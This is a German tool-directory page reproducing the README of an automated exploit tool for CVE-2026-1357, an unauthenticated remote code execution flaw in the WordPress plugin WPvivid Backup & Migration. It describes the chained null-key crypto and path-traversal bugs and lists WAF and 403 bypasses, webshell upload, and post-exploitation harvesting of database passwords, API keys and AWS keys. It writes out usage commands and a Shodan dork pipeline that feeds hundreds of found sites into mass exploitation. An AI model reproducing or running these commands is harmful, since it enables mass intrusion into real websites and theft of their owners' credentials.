Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1357-POC — Automatisiertes Exploit-Tool für CVE-2026-1357, eine nicht authentifizierte RCE in WPvivid Backup & Migration. Scannt WordPress-Ziele, umgeht WAF/403, lädt eine Shell über Path Traversal hoch und führt Post-Exploitation-Reconnaissance mit Berichtserstellung durch. | Kitploit
Tools/GitHubGitHub/cybertechajju/cve-2026-1357-poc
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationDatenexfiltrationPost-ExploitationWAF-UmgehungPenetrationstests

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

Automatisiertes Exploit-Tool für CVE-2026-1357, eine nicht authentifizierte RCE in WPvivid Backup & Migration. Scannt WordPress-Ziele, umgeht WAF/403, lädt eine Shell über Path Traversal hoch und führt Post-Exploitation-Reconnaissance mit Berichtserstellung durch.

Repository anzeigen
9132vor 7 MonatenNoch nicht geprüft
Teilen

CVE-2026-1357 — WPvivid Backup & Migration RCE

CVE-Credit: Lucas Montes (NiRoX)
Tool von: CyberTechAjju
CVSS: 9.8 (Kritisch) | Betroffen: ≤ 0.9.123 | Gepatcht: 0.9.124


⚠️ Haftungsausschluss

Nur für autorisierte Sicherheitstests. Unautorisierter Zugriff auf Systeme ist illegal.


Übersicht

Unauthentifizierte RCE in WPvivid Backup & Migration über zwei verkettete Bugs:

  1. Crypto Fail-Open — openssl_private_decrypt() gibt bei falschem Schlüssel false zurück → phpseclib v1 behandelt dies als Null-Byte-AES-Schlüssel → Angreifer verschlüsselt mit 16 Null-Bytes
  2. Path Traversal — unsanitisiertes name-Feld → ../uploads/shell.php entkommt dem Backup-Verzeichnis

Einschränkung: Nur ausnutzbar, wenn wpvivid_api_token generiert und nicht abgelaufen ist.


Funktionen

FunktionBeschreibung
🔍 Auto-ErkennungWordPress + WPvivid-Plugin + Versions-Fingerprinting
🛡️ WAF-BypassUser-Agent-Rotation, Header-Spoofing, Encoding-Tricks
🔓 403-BypassX-Forwarded-For, X-Original-URL, Pfadnormalisierung, doppeltes Encoding
💀 Auto-ExploitNull-Key-AES-Payload + Path-Traversal-Upload
📋 Post-ExploitFührt automatisch 20+ Recon-Befehle aus (id, whoami, passwd, wp-config, SUID, etc.)
🔑 DatenextraktorGrept DB-Zugangsdaten, API-Keys, Passwörter, AWS-Keys aus der Ausgabe
📊 BerichtsgenerierungMarkdown-PoC-Bericht mit vollständigen Exploit-Nachweisen
⚡ Massen-ScanMultithreaded mit Proxy/Burp-Unterstützung

Installation

git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

Verwendung

# Nur scannen (WordPress + WPvivid + Version erkennen)
python3 cve_2026_1357.py -u http://target.com

# Scannen + Exploit + automatische Post-Exploitation
python3 cve_2026_1357.py -u http://target.com --exploit

# Exploit ohne Post-Exploitation-Recon
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# Massen-Scan mit Bericht
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# Über Burp-Proxy
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# Nur-Payload-Modus
python3 cve_2026_1357.py -u http://x --payload-only

Alle Optionen

-u, --url         Einzelne Ziel-URL
-l, --list        Datei mit URLs (eine pro Zeile)
--exploit         Exploit-Modus aktivieren
--shell NAME      Shell-Dateiname (Standard: pwn_remote.php)
--no-post         Post-Exploitation-Recon überspringen
--report          Markdown-PoC-Bericht generieren
--report-dir DIR  Ausgabeverzeichnis für Berichte
-t, --threads N   Parallele Threads (Standard: 5)
--timeout SECS    Request-Timeout (Standard: 10)
--proxy URL       HTTP-Proxy für Burp
--payload-only    Base64-Payload ausgeben & beenden
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

Ziel-Erkennung (Dorks)

Siehe dorks.md für die vollständige Liste. Schnelle Beispiele:

# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# Pipeline
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

Dateien

CVE-2026-1357-poc/
├── cve_2026_1357.py    ← Haupttool (Scanner + Exploiter + Post-Exploit)
├── dorks.md            ← Shodan/Google/Censys/FOFA/ZoomEye-Dorks
├── requirements.txt    ← Python-Abhängigkeiten
├── .gitignore
└── README.md           ← Diese Datei

Credits

Lucas Montes (NiRoX) — CVE-Entdeckung
CyberTechAjju — Exploit-Tooling

Tool herunterladen